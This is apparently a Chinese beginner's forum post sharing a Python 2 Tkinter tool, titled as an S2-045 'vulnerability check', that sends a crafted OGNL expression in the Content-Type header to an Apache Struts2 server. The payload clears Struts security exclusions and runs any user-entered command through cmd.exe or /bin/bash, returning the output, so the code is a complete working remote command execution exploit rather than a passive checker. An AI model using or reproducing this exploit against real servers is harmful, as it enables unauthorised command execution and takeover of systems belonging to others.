初学python脚本,写个工具练练手。第一次写勿喷。呃...忘了截图了,补上了。
程序对于处理 JSON post 有些问题,其他地方还没发现有啥问题。
#coding:utf-8 import chardet import urllib2 import httplib from Tkinter import * from poster.encode import multipart_encode from poster.streaminghttp import register_openers httplib.HTTPConnection._http_vsn = 500 httplib.HTTPConnection._http_vsn_str = 'HTTP/1.1' class START(): def __init__(self,root): self.root=root self.show_W_Text = Text() self.show_url_ed = Label(root, text="请输入URL,例如:http://www.88.com,一定要有http://,否则报错") self.edit_url = Entry(root, text="输入地址",width = 80) self.show_cmd_ed = Label(root, text="请输入命令,例如:whoami") self.edit_cmd = Entry(root, text="输入命令",width = 80) self.butt_whois = Button(root, text="发送测试",command=self.poc) self.show_url_ed.pack() self.edit_url.pack() self.show_cmd_ed.pack() self.edit_cmd.pack() self.butt_whois.pack() self.show_W_Text.pack() def poc(self): w_url = self.edit_url.get() w_cmd = self.edit_cmd.get() text = self.show_W_Text register_openers() datagen, header = multipart_encode({"image1":""}) header[ "User-Agent"] = "Chrome/56.0.2924.87" header[ "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+w_cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" request = urllib2.Request(w_url, datagen, headers=header) response = urllib2.urlopen(request).read() char = chardet.detect(response)["encoding"] if char == 'GB2312': response = response.decode("GBK").encode("UTF-8") else: response = response.decode(char).encode("UTF-8") text.insert(1.0, "执行结果为: "+response) if __name__ == '__main__': root=Tk() root.title("S2-45漏洞检测") motion=START(root) mainloop()